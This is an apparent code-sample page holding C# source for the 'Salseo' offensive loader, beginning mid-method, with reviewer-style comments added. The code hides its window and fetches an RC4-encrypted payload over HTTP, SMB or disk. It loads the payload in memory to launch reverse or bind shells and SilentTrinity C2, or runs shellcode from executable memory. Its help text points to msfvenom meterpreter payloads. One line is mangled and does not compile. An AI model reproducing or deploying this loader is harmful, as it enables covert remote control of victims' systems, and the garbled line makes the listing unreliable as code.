            {
                // Only LHOST is passed for this mode (with a trailing space).
                string     LHOST      = args[3].ToString();
                string[]   argumentos = new string[] { LHOST + " " };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseicmp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "bindtcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("bindtcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            // Shellcode mode: the decrypted bytes are executed inside the current process.
            // VirtualAlloc/VirtualFree, the AllocationType/MemoryProtection/FreeType enums and
            // ExecuteDelegate are declared elsewhere (presumably kernel32 P/Invoke wrappers).
            if (funcion == "shellcode")
            {
                byte[] sc       = Final_Payload;
                // Requests sc.Length + 1 bytes, reserved and committed, with EXECUTE_READWRITE
                // protection; IntPtr.Zero leaves the address choice to the callee.
                IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
                // Debug.Assert only runs in builds that define DEBUG; otherwise a zero baseAddr
                // is not checked here. The message says "remote" memory although the allocation
                // is made in this process.
                System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: No se pudo asignar la memoria remota.");
                Console.WriteLine("[+] Intentando cargar Shellcode");

                try
                {
                    // Copy the buffer into the region, wrap its address in a delegate and call it.
                    Marshal.Copy(sc, 0, baseAddr, sc.Length);
                    ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));

                    del();
                }
                catch (Exception e)
                {
                    // Managed exceptions are reported by message only.
                    Console.WriteLine(e.Message);
                }
                finally
                {
                    // The region is released once the call returns or throws.
                    VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
                }
            }
        }
Beispiel #4
        /// <summary>
        /// Entry point of the "standalone" loader variant. It reads its settings from
        /// .\mandanga.txt, obtains an encoded payload from an HTTP, UNC or local path,
        /// decodes it, and then either loads it as a .NET assembly and invokes one
        /// named method through reflection, or copies it into executable memory and
        /// calls it as native code.
        /// </summary>
        /// <remarks>
        /// Behaviours visible in this method that are useful when analysing or
        /// detecting it: the process hides its own main window; configuration comes
        /// from a fixed file name in the working directory; the payload is loaded with
        /// Assembly.Load from a byte array rather than from a file on disk; and the
        /// shellcode path requests RESERVE|COMMIT memory with EXECUTE_READWRITE
        /// protection and calls into it through a delegate.
        /// ShowWindow, VirtualAlloc, VirtualFree, ExecuteDelegate, ClienteWeb,
        /// LeeArchivoSMBorLocal, Zipea, StringHEXToByteArray and RC4 are declared
        /// outside this block; what is said about them below is inferred from names
        /// and call sites only.
        /// </remarks>
        /// <param name="args">Command-line arguments; not read by this method.</param>
        static void Main(string[] args)
        {
            // Hide the process's main window. ShowWindow is declared elsewhere
            // (presumably the user32 P/Invoke, where 0 is SW_HIDE - confirm).
            IntPtr h = Process.GetCurrentProcess().MainWindowHandle;

            ShowWindow(h, 0);
            string banner = @"
  _____  ____  _     _____   ___   ___    
 / ___/ /    || |   / ___/  /  _] /   \   
(   \_ |  o  || |  (   \_  /  [_ |     |  
 \__  ||     || |___\__  ||    _]|  O  |  
 /  \ ||  _  ||     /  \ ||   [_ |     |  
 \    ||  |  ||     \    ||     ||     |  
  \___||__|__||_____|\___||_____| \___/   
                                          
 _       ___    ____  ___      ___  ____  
| |     /   \  /    ||   \    /  _]|    \ 
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    / 
|     ||     ||  _  ||     ||   [_ |    \ 
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

";

            // Banner and author line are written to the console on every run.
            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write(banner);
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("                             By: CyberVaca@HackPlayers");

            // Help text; printed whenever mandanga.txt is missing or has too few lines.
            string ayuda = @"
[+] Usage:

    [-] SalseoStandalone.exe
    [-] You need to have your mandanga.txt on the same folder!
    [-] Serve your payload as you want! SMB, HTTP, Locally...
    [-] Want a meterpreter shell? Create a raw payload with msfvenom,
        encrypt it with encrypterassembly.py and use shellcode function.

    [-] Mandanga.txt contents:
        [-] Reverse TCP/UDP/SSL     [-] Reverse ICMP        [-] Reverse DNS
            <password>                  <password>              <password>
            <path_to_elmal.txt>         <path_to_elmal.txt>     <path_to_elmal.txt>
            reversetcp/udp/ssl          reverseicmp             reversedns
            <LHOST>                     <LHOST>                 <LHOST>
            <LPORT>                                             <DNS Server>

        [-] Bind TCP                [-] SilentTrinity       [-] Shellcode
            <password>                  <password>              <password>
            <path_to_elmal.txt>         <path_to_elmal.txt>     <path_to_payload.txt>
            bindtcp                     silenttrinity           shellcode
            <LHOST>                     <URL_to_C2C>             
            <LPORT> 
   
[+] Available Payloads:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

";
            //################### Loader parameters and validation of the supplied arguments ###################

            //////////////////////STANDALONE VERSION
            // All settings are taken from this fixed relative path, one value per line.
            string file_name  = ".\\mandanga.txt";
            string clave      = "";
            string Salseo_URL = "";
            string funcion    = "";
            string DNSServer  = "";
            string URLSILENT  = "";
            string LHOST      = "";
            string LPORT      = "";

            if (System.IO.File.Exists(file_name) == true)
            {
                System.IO.StreamReader objReader;
                try
                {
                    // The file is re-read with File.ReadLines each time a line count is
                    // needed; fewer than three lines prints the help text and exits with code 1.
                    if (File.ReadLines(file_name).Count() < 3)
                    {
                        Console.WriteLine(ayuda); Environment.Exit(1);
                    }
                    objReader  = new System.IO.StreamReader(file_name);
                    clave      = objReader.ReadLine();           // Line 1: password (always present).
                    Salseo_URL = objReader.ReadLine();           // Line 2: payload location (always present).
                    funcion    = objReader.ReadLine().ToLower(); // Line 3: function name, lower-cased (always present).

                    // NOTE(review): the next line is mangled in this copy of the listing (the
                    // text between the two string literals was replaced by asterisks) and does
                    // not compile as shown. Presumably it printed the password and opened an
                    // if on funcion == "shellcode" - confirm against the upstream source.
                    Console.WriteLine("[+] Password: "******"shellcode")
                    {
                        Console.WriteLine("[+] Shellcode path: " + Salseo_URL);
                    }
                    else
                    {
                        Console.WriteLine("[+] Elmal.txt path: " + Salseo_URL);
                    }
                    Console.WriteLine("[+] Chosen Function: " + funcion);
                    if (funcion == "shellcode")
                    {
                        // No further lines are read for the shellcode function.
                    }
                    else if (funcion == "silenttrinity")
                    {
                        if (File.ReadLines(file_name).Count() < 4)
                        {
                            Console.WriteLine(ayuda); Environment.Exit(1);
                        }
                        URLSILENT = objReader.ReadLine(); // Line 4: SilentTrinity URL.
                        Console.WriteLine("[+] SilentTrinity URL: " + URLSILENT);
                    }
                    else if (funcion == "icmp")
                    {
                        // Matches the literal "icmp"; the dispatch further down tests "reverseicmp".
                        if (File.ReadLines(file_name).Count() < 4)
                        {
                            Console.WriteLine(ayuda); Environment.Exit(1);
                        }
                        LHOST = objReader.ReadLine(); // Line 4 is stored as LHOST (the label printed below still says SilentTrinity URL).
                        Console.WriteLine("[+] SilentTrinity URL: " + LHOST);
                    }
                    else if (funcion == "serverdns")
                    {
                        // Matches the literal "serverdns"; the dispatch further down tests "reversedns".
                        //HOST + DNSserver for dns shells.
                        if (File.ReadLines(file_name).Count() < 5)
                        {
                            Console.WriteLine(ayuda); Environment.Exit(1);
                        }
                        LHOST     = objReader.ReadLine();
                        DNSServer = objReader.ReadLine();
                        Console.WriteLine("IP: " + LHOST);
                        Console.WriteLine("Port: " + DNSServer);
                    }
                    else
                    {
                        // Every other function name lands here and needs five lines.
                        //HOST + PORT for bind/reverse shells.
                        if (File.ReadLines(file_name).Count() < 5)
                        {
                            Console.WriteLine(ayuda); Environment.Exit(1);
                        }
                        LHOST = objReader.ReadLine();
                        LPORT = objReader.ReadLine();
                        Console.WriteLine("IP: " + LHOST);
                        Console.WriteLine("Port: " + LPORT);
                    }
                    objReader.Close();
                }
                catch (System.NullReferenceException e)
                {
                    // Only NullReferenceException is caught here; it is printed and
                    // execution continues with whatever values were read so far.
                    Console.WriteLine(e);
                }
            }
            else
            {
                Console.WriteLine(ayuda); Console.WriteLine("[-] .\\mandanga.txt file does not exist."); Environment.Exit(1);
            }



            string Salseo_Encriptado = null;

            // The password's ASCII bytes are the key passed to RC4.Decrypt below.
            byte[] xKey = Encoding.ASCII.GetBytes(clave);
            Console.ForegroundColor = ConsoleColor.Gray;
            // Payload source is chosen from the prefix of Salseo_URL: "http" goes to
            // ClienteWeb.LeePayload, a leading "\\" (UNC path) or anything else goes to
            // LeeArchivoSMBorLocal.Archivo after a File.Exists check. Both helpers are
            // declared outside this block.
            if (Salseo_URL.Substring(0, 4).ToLower() == "http")
            {
                Salseo_Encriptado = ClienteWeb.LeePayload(Salseo_URL);
            }
            if (Salseo_URL.Substring(0, 2).ToLower() == "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(Salseo_URL);
            }
            if (Salseo_URL.Substring(0, 4).ToLower() != "http" && Salseo_URL.Substring(0, 2).ToLower() != "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(Salseo_URL);
            }
            //#############################################################
            //######################## Loading DLL ########################
            //#############################################################

            // Decode chain as written: Zipea.Descomprime -> StringHEXToByteArray.Convierte
            // -> RC4.Decrypt with xKey. The helpers are not shown; their names suggest
            // decompression, hex decoding and RC4 decryption.
            string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);

            byte[]   Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
            byte[]   Final_Payload            = RC4.Decrypt(xKey, Final_Payload_encriptado);
            string   clases   = null;
            Assembly salsongo = null;

            if (funcion != "shellcode")
            {
                // The decoded bytes are loaded as a managed assembly straight from
                // memory; this method writes no payload file to disk. Byte-array
                // assembly loads are a common monitoring point for in-memory
                // .NET tradecraft.
                salsongo = Assembly.Load(Final_Payload);
                Console.WriteLine("[+] Cargando la salsa en memoria.");
                Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
                // clases ends up holding the name of the last type enumerated; it is
                // not read again in this method.
                foreach (Type infoass in salsongo.GetTypes())
                {
                    var strclase = string.Format("{0}", infoass.Name); clases = strclase;
                }
                ;
            }

            // Each dispatch block below follows the same pattern: take the first type
            // of the loaded assembly, look up a method by its lower-case name, create an
            // instance with the parameterless constructor and invoke the method with a
            // one-element string[] argument.

            //########################### Call to the SilentTrinity function ########################
            if (funcion == "silenttrinity")
            {
                string[]   argumentos = new string[] { URLSILENT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("lanza");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            //########################### Call to the reverse functions ########################

            if (funcion == "reversetcp")
            {
                // The single argument is "LHOST LPORT" joined by one space.
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversetcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversessl")
            {
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversessl");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseudp")
            {
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseudp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversedns")
            {
                // The single argument is "LHOST DNSServer" joined by one space.
                string[]   argumentos = new string[] { LHOST + " " + DNSServer };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversedns");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseicmp")
            {
                // The single argument is LHOST followed by a trailing space.
                string[]   argumentos = new string[] { LHOST + " " };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseicmp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "bindtcp")
            {
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("bindtcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "shellcode")
            {
                // Native-code path: the decoded bytes are not loaded as an assembly.
                // Memory of sc.Length + 1 bytes is requested with RESERVE|COMMIT and
                // EXECUTE_READWRITE protection in the current process. A writable and
                // executable private allocation that is then executed is a well-known
                // detection signal.
                byte[] sc       = Final_Payload;
                IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
                // Debug.Assert is compiled out of release builds, so this is the only
                // check on the allocation result and it applies to debug builds only.
                System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: No se pudo asignar la memoria remota.");
                Console.WriteLine("[+] Intentando cargar Shellcode");

                try
                {
                    // Copy the bytes into the allocation, wrap its address in an
                    // ExecuteDelegate (declared elsewhere) and call it on this thread.
                    Marshal.Copy(sc, 0, baseAddr, sc.Length);
                    ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));

                    del();
                }
                catch (Exception e)
                {
                    // Any managed exception is reduced to its message on the console.
                    Console.WriteLine(e.Message);
                }
                finally
                {
                    // The allocation is released whether or not the call returned normally.
                    VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
                }
            }
        }